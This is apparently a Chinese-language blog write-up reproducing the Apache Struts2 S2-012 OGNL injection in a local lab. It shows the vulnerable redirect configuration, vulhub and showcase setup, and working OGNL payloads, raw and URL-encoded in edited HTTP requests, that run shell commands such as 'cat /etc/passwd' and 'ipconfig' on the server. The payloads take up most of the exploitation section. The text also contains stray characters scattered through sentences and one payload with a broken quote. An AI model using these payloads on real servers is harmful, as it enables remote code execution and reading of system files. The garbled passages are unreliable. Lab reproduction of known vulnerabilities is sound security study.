S2-012

此文僅供大家交流學(xué)習(xí)，嚴(yán)禁非法使用

一鉴逞、參考網(wǎng)址：

https://github.com/phith0n/vulhub
https://struts.apache.org/docs/s2-012.html

二记某、 影響版本：

Struts Showcase App 2.0.0 - Struts Showcase App 2.3.13

三、 漏洞介紹：

OGNL提供了廣泛的表達(dá)式評估功能等功能华蜒。
包含特制請求參數(shù)的請求可用于將任意OGNL代碼注入到屬性中辙纬，此后將其用作重定向地址的請求參數(shù)豁遭，這將導(dǎo)致進(jìn)一步的評估叭喜。
OGNL評估已經(jīng)在S2-003和S2-005和S2-009中得到解決，但是由于它只涉及參數(shù)的名稱蓖谢，所以證明了基于白名單可接受的參數(shù)名稱并拒絕對參數(shù)中包含的表達(dá)式進(jìn)行評估的結(jié)果修復(fù)名稱捂蕴，僅部分關(guān)閉了漏洞。
第二個評估發(fā)生在重定向結(jié)果從棧中讀取并使用先前注入的代碼作為重定向參數(shù)時闪幽。
這使得惡意用戶將任意的OGNL語句放置在由操作公開的任何未歸類的String變量中啥辨，并將其評估為OGNL表達(dá)式，以便繞過Struts和OGNL庫保護(hù)來執(zhí)行方法執(zhí)行并執(zhí)行任意方法盯腌。

如果在配置 Action 中 Result 時使用了重定向類型溉知，并且還使用 ${param_name} 作為重定向變量，例如：

<package name="S2-012" extends="struts-default">
    <action name="user" class="com.demo.action.UserAction">
        <result name="redirect" type="redirect">/index.jsp?name=${name}</result>
        <result name="input">/index.jsp</result>
        <result name="success">/index.jsp</result>
    </action>
</package>

這里 UserAction 中定義有一個 name 變量腕够，當(dāng)觸發(fā) redirect 類型返回時级乍，Struts2 獲取使用 ${name} 獲取其值，在這個過程中會對 name 參數(shù)的值執(zhí)行 OGNL 表達(dá)式解析帚湘，從而可以插入任意 OGNL 表達(dá)式導(dǎo)致命令執(zhí)行玫荣。

四、 環(huán)境搭建：（windows）

• 下載/struts/2.1.6

下載地址：http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip

• 下載安裝xampp

• 部署showcase

• 解壓

2.1.6_1.png

2.1.6_2.png

• 復(fù)制到.

2.1.6_3.png

• 重啟tomcat

2.1.6_4.png

• 已成功自動部署

2.1.6_5.png

• 訪問http://127.0.0.1:8080/struts2-showcase-2.1.6/showcase.action

環(huán)境搭建：（ubuntu）

• 安裝pip

curl -s https://bootstrap.pypa.io/get-pip.py | python3

• 安裝docker

apt-get update && apt-get install docker.io

• 啟動docker服務(wù)

service docker start

• 安裝compose

pip install docker-compose

注意要先ssh連接大诸，將公鑰添加到github上捅厂，具體參照網(wǎng)上教程

• 拉取項目

git clone git@github.com:phith0n/vulhub.git
cd vulhub

• 進(jìn)入某一個漏洞/環(huán)境的目錄

cd nginx_php5_mysql

• 自動化編譯環(huán)境

docker-compose build

• 啟動整個環(huán)境

docker-compose up -d

五贯卦、 POC:

POC（Linux）

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat", "/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c", "ls})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

兩個例子，命令執(zhí)行方式不同焙贷，本人菜鳥一枚撵割，測試ipconfig和netstat總是實在，一直在懷疑POC問題盈厘，結(jié)果后來發(fā)現(xiàn)是docker容器的問題睁枕，測試正常的程序可正常運行把跨。希望大家吸取教訓(xùn)少走彎路瓶竭。

六、修改數(shù)據(jù)包

原數(shù)據(jù)包：

POST /user.action HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://192.168.137.129:8080/user.action
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Content-Length: 606
Host: 192.168.137.129:8080
Pragma: no-cache
Cookie: JSESSIONID=903BE0F1A8CA6E90F711BE7214D5608C
Connection: close

name=aaa

修改后為

POST /user.action HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://192.168.137.129:8080/user.action
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Content-Type: application/x-www-form-urlencoded
Content-Length: 606
Host: 192.168.137.129:8080
Pragma: no-cache
Cookie: JSESSIONID=903BE0F1A8CA6E90F711BE7214D5608C
Connection: close

name=%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22%2fbin%2fbash%22%2C%22-c%22%2C%20%22ip%20addr%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D

七女阀、執(zhí)行結(jié)果

1.png

八契吉、 Windows環(huán)境利用過程

POC（windows）

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cmd.exe", "/c", "ipconfig"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

訪問網(wǎng)址：http://127.0.0.1:8080/struts2-showcase-2.1.6/skill/edit.action
原數(shù)據(jù)包為

POST /struts2-showcase-2.1.6/skill/save.action HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 643
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1:8080/struts2-showcase-2.1.6/skill/edit.action?skillName=%{
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=8B6C25A29EB2E058507066BA06ED9974
Connection: close

currentSkill.name=aaa&currentSkill.description=

修改后為

POST /struts2-showcase-2.1.6/skill/save.action HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 643
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1:8080/struts2-showcase-2.1.6/skill/edit.action?skillName=%{
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=8B6C25A29EB2E058507066BA06ED9974
Connection: close

currentSkill.name=%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22cmd.exe%22%2C%20%22%2fc%22%2C%20%22ipconfig%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D&currentSkill.description=

執(zhí)行結(jié)果：

2.png

九跳仿、 至此，該漏洞基本利用完畢

本人還是一個未畢業(yè)的小萌新捐晶，希望大家多多幫助菲语，有問題請發(fā)送郵件到xrzsupupup@163.com不勝感激，我也會盡量去幫助大家

堅決做一名白帽子